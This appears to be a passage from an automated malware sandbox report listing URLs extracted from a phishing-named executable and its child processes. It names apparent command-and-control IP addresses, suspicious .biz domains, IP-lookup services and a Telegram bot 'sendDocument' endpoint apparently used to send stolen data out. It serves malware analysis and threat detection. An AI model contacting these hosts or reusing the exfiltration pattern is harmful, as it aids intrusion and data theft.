                          Source: alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/kwsxhlpkribwfgiG
                          Source: alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/067O
                          Source: alg.exe, 0000000B.00000003.2509027263.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/3
                          Source: alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/gs
                          Source: alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/mblybww
                          Source: alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/pW
                          Source: alg.exe, 0000000B.00000003.2508497113.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/pcyu
                          Source: alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/pjpssoyxmlc
                          Source: alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2404953266.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/rbdfcj
                          Source: alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/rbdfcjngs3
                          Source: alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/s
                          Source: alg.exe, 0000000B.00000003.2509027263.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225:80/pcyutdnis
                          Source: alg.exe, 0000000B.00000003.2509027263.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225:80/pjpssoyxmlc
                          Source: alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225:80/rbdfcjs
                          Source: alg.exe, 0000000B.00000003.2404953266.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.227.7.138/
                          Source: alg.exe, 0000000B.00000003.1785481441.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/
                          Source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/tloalmkxssnuris
                          Source: alg.exe, 0000000B.00000003.2319647398.00000000005C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/ld
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.000000000059C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1751356659.000000000059C000.00000004.00000020.00020000.00000000.sdmp, zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/0
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/6noh
                          Source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/G
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/Kn
                          Source: alg.exe, 0000000B.00000003.1751356659.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/W
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1804169295.0000000006A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/haobwbcukjixe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1804169295.0000000006A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/haobwbcukjixeEK
                          Source: alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/lcaecfwoxcmb
                          Source: alg.exe, 0000000B.00000003.1751356659.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/mshapsve
                          Source: alg.exe, 0000000B.00000003.1751167364.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1752034139.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1769440706.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/mshapsvejF
                          Source: alg.exe, 0000000B.00000003.2490536622.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/vcdhvtdni
                          Source: alg.exe, 0000000B.00000003.2490536622.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/vcdhvtdni4/
                          Source: alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/vcdhvtdnibG
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1805369474.0000000006A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/haobwbcukjixec
                          Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/oxojrkg
                          Source: alg.exe, 0000000B.00000003.2490536622.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/vcdhvtdnis
                          Source: zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmp, zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/
                          Source: zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/8N
                          Source: zeXKjViL.exe, 00000022.00000002.1998728250.0000000001192000.00000004.00000020.00020000.00000000.sdmp, zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/ehlglgm
                          Source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/ehlglgmf
                          Source: alg.exe, 0000000B.00000003.2043821981.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xpqdcslnorZG
                          Source: zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/yN
                          Source: zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/~N
                          Source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/ehlglgm
                          Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/ewlG
                          Source: alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/mt0
                          Source: alg.exe, 0000000B.00000003.2043821981.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                          Source: alg.exe, 0000000B.00000003.2276780321.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2276851295.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/mxuujpbjwek
                          Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/yrkakyyuj
                          Source: alg.exe, 0000000B.00000003.2043821981.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/yrkakyyujbG
                          Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/yrkakyyujok
                          Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/yrkakyyuj
                          Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                          Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                          Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.000000000257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                          Source: Microsofts.exe, 00000013.00000002.2962626553.0000000002511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                          Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                          Source: Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                          Source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cvgrf.biz/
                          Source: alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dwrqljrr.biz/
                          Source: powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oshhkdluh.biz/
                          Source: powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: Microsofts.exe, 00000013.00000002.2962626553.00000000025AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                          Source: Microsofts.exe, 00000013.00000002.2962626553.00000000025AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                          Source: AppVClient.exe, 0000000F.00000003.1738761071.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1739252603.00000000004F2000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1738915554.00000000004EA000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000002.1740234733.0000000000502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
                          Source: powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1743418494.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, zeXKjViL.exe, 0000000A.00000002.1969679616.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.0000000002511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1815132146.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: alg.exe, 0000000B.00000003.1811642166.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1810999604.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzczYTViOTk3
                          Source: alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2276780321.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2319213027.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1828304171.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2337109742.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2362330225.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811544228.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2347520396.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2320859769.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2300658084.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042471889.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2334108033.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931
                          Source: alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042802989.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811544228.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042471889.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931-
                          Source: alg.exe, 0000000B.00000003.2487771643.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378624503.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2439037295.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2478810531.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2520863860.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2469824753.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374643516.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2428261033.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2403997151.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2381504483.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379712272.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2448551766.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2450029854.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2519990908.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2389962725.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2421255187.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2507445109.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2456649330.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2380661999.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2395959016.00000000005DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.fwiwk.biz/m?usid=27&utid=10221880067
                          Source: alg.exe, 0000000B.00000003.2487771643.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378624503.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2439037295.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2478810531.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2520863860.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2469824753.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2428261033.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2403997151.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2381504483.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379712272.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2448551766.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2450029854.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2519990908.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2421255187.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2507445109.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2456649330.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2380661999.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378427431.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379494326.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2457233820.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2389807495.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.fwiwk.biz/mt?usid=27&utid=10221880299
                          Source: zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/ehlglgm?usid=27&utid=10221870153
                          Source: alg.exe, 0000000B.00000003.2060995477.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2301761637.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2317492901.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2321083742.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2276780321.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2319213027.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1828304171.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2337109742.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2362330225.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2347520396.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2320859769.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2300658084.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042471889.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800665917.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2334108033.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/xpqdcslnor?usid=27&utid=10221865676
                          Source: alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz:80/xpqdcslnor?usid=27&utid=10221865676
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: Aut2exe.exe.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/
                          Source: Aut2exe.exe.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/8
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: powershell.exe, 00000016.00000002.1865189964.0000000008B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                          Source: officesvcmgr.exe.11.drString found in binary or memory: http://www.openssl.org/support/faq.html
                          Source: officesvcmgr.exe.11.drString found in binary or memory: http://www.openssl.org/support/faq.htmlerror
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1768352562.0000000005F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com8:
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: alg.exe, 0000000B.00000003.1971135671.00000000015A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: alg.exe, 0000000B.00000003.2334108033.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xlfhhhm.biz/iz/
                          Source: powershell.exe, 00000016.00000002.1815132146.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                          Source: alg.exe, 0000000B.00000003.2654192501.00000000007B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
